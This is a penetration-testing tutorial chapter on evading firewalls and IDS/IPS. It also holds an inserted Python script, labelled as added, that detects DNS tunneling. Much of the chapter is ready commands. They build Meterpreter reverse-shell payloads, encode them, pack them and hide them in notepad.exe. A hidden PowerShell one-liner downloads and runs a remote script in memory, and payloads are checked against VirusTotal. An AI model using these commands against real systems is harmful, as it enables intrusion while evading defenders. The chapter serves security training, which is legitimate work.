Firewall and IDS/IPS Evasion
Overview
Firewalls and intrusion detection/prevention systems (IDS/IPS) are critical components of modern network security. For penetration testers, understanding how these defenses can be bypassed is essential to conducting stealthy and effective engagements. This chapter covers techniques for evading detection and delivering payloads while maintaining operational security.
Firewall and IDS/IPS Basics
Firewalls:
Control traffic flow based on predefined rules.
Block or allow packets based on:
Source/Destination IP
Ports
Protocols
Types:
Network Firewalls (e.g., hardware-based solutions like Cisco ASA)
Host-Based Firewalls (e.g., Windows Defender Firewall)
IDS/IPS:
IDS (Intrusion Detection System): Monitors traffic for suspicious activity and raises alerts.
IPS (Intrusion Prevention System): Actively blocks malicious traffic.
Detection methods:
Signature-Based: Matches traffic patterns against known attack signatures.
Anomaly-Based: Flags traffic that deviates from normal behavior.
Techniques for Firewall Evasion
Port Spoofing:
Deliver payloads over a port the firewall already permits for other services (e.g., port 443, normally used for HTTPS), rather than over the port the payload's protocol would usually use.
Example:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=443 -f exe > payload.exe
Payload Obfuscation:
Encode payloads using tools like msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > encoded_payload.exe
Split Payload Delivery:
Deliver payloads in fragments to bypass filters that inspect or block large payloads.
Example: a small PowerShell stager that downloads the main payload and executes it in memory:
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<ip>/payload.ps1')"
DNS Tunneling:
Encapsulate payload traffic in DNS queries to bypass firewalls.
Example tool: dnscat2.
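As an added example (not part of this chapter), the following Python script shows how a defender could spot DNS tunneling of the kind dnscat2 produces: it scans DNS query log lines for clients that repeatedly send long, high-entropy leftmost labels to the same parent zone. The log format, the thresholds and the sample lines are assumptions constructed for illustration.

```python
import math
import re
from collections import defaultdict

# Constructed sample DNS query log lines (format assumed: "<time> <client> <qname> <qtype>").
SAMPLE_LOG = """\
2024-01-01T10:00:01 10.0.0.5 www.example.com A
2024-01-01T10:00:02 10.0.0.5 mail.example.com MX
2024-01-01T10:00:03 10.0.0.9 3f9a8c1e7b2d4a6f9c0e1b3d5f7a9c2e.tun.example.net TXT
2024-01-01T10:00:03 10.0.0.9 a1b2c3d4e5f60718293a4b5c6d7e8f90.tun.example.net TXT
2024-01-01T10:00:04 10.0.0.9 0f1e2d3c4b5a69788796a5b4c3d2e1f0.tun.example.net TXT
2024-01-01T10:00:05 10.0.0.5 cdn.example.org A
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")

def shannon_entropy(s):
    """Shannon entropy of s in bits per character (0.0 for an empty or single-symbol string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def label_features(qname):
    """Return (longest label length, entropy of the leftmost label, parent zone).
    The parent zone is taken as the last two labels; an assumption that ignores
    multi-label public suffixes such as co.uk."""
    labels = qname.rstrip(".").split(".")
    longest = max(len(label) for label in labels)
    return longest, shannon_entropy(labels[0]), ".".join(labels[-2:])

def find_suspicious(log_text, max_label=24, min_entropy=3.5, min_queries=3):
    """Count queries per (client, parent zone) whose longest label is unusually long
    and whose leftmost label looks like encoded data; return pairs at or above min_queries."""
    hits = defaultdict(int)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the sweep
        _time, client, qname, _qtype = m.groups()
        longest, entropy, zone = label_features(qname)
        if longest > max_label and entropy >= min_entropy:
            hits[(client, zone)] += 1
    return {key: n for key, n in hits.items() if n >= min_queries}

if __name__ == "__main__":
    print(find_suspicious(SAMPLE_LOG))
```

Thresholds should be tuned against a baseline of the network's normal queries, since CDNs and some anti-spam services also use long, random-looking labels.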
HTTP/HTTPS Tunneling:
Use HTTP/HTTPS to route traffic through firewalls that allow web traffic.
Configure a reverse shell:
msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=443 -f exe > https_payload.exe
Techniques for IDS/IPS Evasion
Signature Evasion:
Modify payloads to avoid matching known attack patterns:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -f exe > stealth_payload.exe
Traffic Encryption:
Use encrypted channels (e.g., HTTPS) for command and control traffic.
Example:
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST <ip>
set LPORT 443
exploit
Timing Attacks:
Send traffic in bursts or with delays between packets to avoid triggering anomaly-based detection.
Example: Use Nmap with timing options:
nmap -T2 -sS <target_ip>
Packer Tools:
Use packers to obfuscate executable payloads.
Popular packers:
UPX:
upx --best --lzma payload.exe
Themida: Advanced commercial packer with anti-reverse engineering features.
Legitimate Application Templates:
Embed payloads in legitimate applications or documents.
Example:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -x notepad.exe -k -f exe > notepad_payload.exe
Evasion Example: Using msfvenom with Custom Templates
Generate an Encoded Payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe > payload.exe
Embed Payload in a Legitimate Application:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -x notepad.exe -k -f exe > safe_payload.exe
Use HTTPS for Stealth:
msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=443 -f exe > https_payload.exe
Verify Payload Detection:
Upload the payload to VirusTotal to check for AV detection:
msf-virustotal -k <api_key> -f payload.exe
Best Practices for Evasion
Test in a Sandbox:
Verify payload functionality in a controlled environment.
Avoid Reuse:
Customize payloads for each engagement to avoid detection by updated signatures.
Combine Techniques:
Layer multiple evasion methods (e.g., encoding + encryption).
Stay Updated:
Keep up with the latest evasion techniques and tools.
Command Cheatsheet
msfvenom -p <payload>
Generate payloads.
msfvenom -e <encoder>
Encode payloads for evasion.
upx --best --lzma <file>
Compress and obfuscate payloads.
msf-virustotal -k <api_key>
Check payload detection rates on VirusTotal.
nmap -T2
Conduct slow scans to avoid IDS detection.